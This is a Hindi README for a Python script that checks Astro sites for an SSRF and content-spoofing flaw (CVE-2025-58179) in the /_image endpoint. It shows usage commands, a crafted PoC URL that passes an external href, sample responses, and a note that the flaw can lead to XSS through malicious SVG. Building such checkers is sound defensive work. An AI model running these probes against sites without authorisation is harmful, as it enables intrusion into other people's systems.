
पायथन स्क्रिप्ट जो Astro के `/_image` एंडपॉइंट में SSRF और कंटेंट स्पूफिंग कमजोरियों (CVE-2025-58179) की पुष्टि करती है, जिसमें स्वचालित PoC URL जनरेशन और HTTP रिस्पॉन्स सत्यापन शामिल है।
CVE-2025-58179-Check एस्ट्रो फ्रेमवर्क में /_image एंडपॉइंट पर SSRF (Server-Side Request Forgery) / Content Spoofing भेद्यता को सत्यापित करने के लिए एक साधारण Python स्क्रिप्ट है।
यह भेद्यता GHSA-qpr4-c339-7vq8 और CVE-2025-58179 के रूप में ट्रैक की जाती है।
यह भेद्यता उन Astro साइटों को प्रभावित करती है जो @astrojs/cloudflare एडेप्टर का उपयोग output: 'server' कॉन्फ़िगरेशन के साथ करती हैं। /_image एंडपॉइंट, जिसे छवियों को अनुकूलित करना चाहिए, href पैरामीटर को सही ढंग से मान्य नहीं करता है।
इससे हमलावर सर्वर को किसी भी अनधिकृत बाहरी डोमेन से सामग्री लाने और प्रस्तुत करने के लिए मजबूर कर सकता है। इसका प्रभाव SSRF हो सकता है, और यदि वह बाहरी सामग्री एक दुर्भावनापूर्ण फ़ाइल है (जैसे स्क्रिप्ट युक्त SVG), तो यह Cross-Site Scripting (XSS) का कारण बन सकती है।
यह स्क्रिप्ट यह जाँचने की प्रक्रिया को स्वचालित करती है कि कोई साइट इस समस्या के प्रति संवेदनशील है या नहीं।
Content-Type: image/* के साथ Status 200)।requests लाइब्रेरी (केवल यदि सत्यापन कार्यक्षमता का उपयोग कर रहे हैं)आप pip का उपयोग करके requests इंस्टॉल कर सकते हैं:
pip install requests
CVE-2025-58179-Check.py स्क्रिप्ट को कॉपी करें।chmod +x CVE-2025-58179-Check.pyयह विकल्प केवल एन्कोडेड PoC URL प्रिंट करेगा। यदि आप ब्राउज़र या अन्य टूल्स के साथ मैन्युअल रूप से परीक्षण करना चाहते हैं तो यह उपयोगी है।
कमांड:
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>
उदाहरण:
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)
आउटपुट:
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
यह विकल्प URL बनाएगा और सर्वर प्रतिक्रिया को सत्यापित करने के लिए सीधे HTTP GET अनुरोध भेजेगा।
कमांड:
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r
उदाहरण:
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request
यदि सर्वर स्थिति कोड 200 लौटाता है और सामग्री प्रकार छवि है, तो यह इंगित करता है कि सर्वर ने बाहरी सामग्री ली और प्रस्तुत की है।
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!
जो सर्वर पैच किया गया है या सही ढंग से कॉन्फ़िगर किया गया है, वह अनधिकृत बाहरी डोमेन से अनुरोध को अस्वीकार कर देगा, आमतौर पर 4xx स्थिति लौटाकर।
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)
[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible
[!WARNING] चेतावनी
- यह स्क्रिप्ट शैक्षिक उद्देश्यों और वैध सुरक्षा परीक्षण के लिए बनाई गई है।
- उपयोगकर्ता अपने कार्यों के लिए पूरी तरह ज़िम्मेदार है। इस स्क्रिप्ट का उपयोग उन सिस्टमों पर न करें जिनके लिए आपके पास अनुमति नहीं है।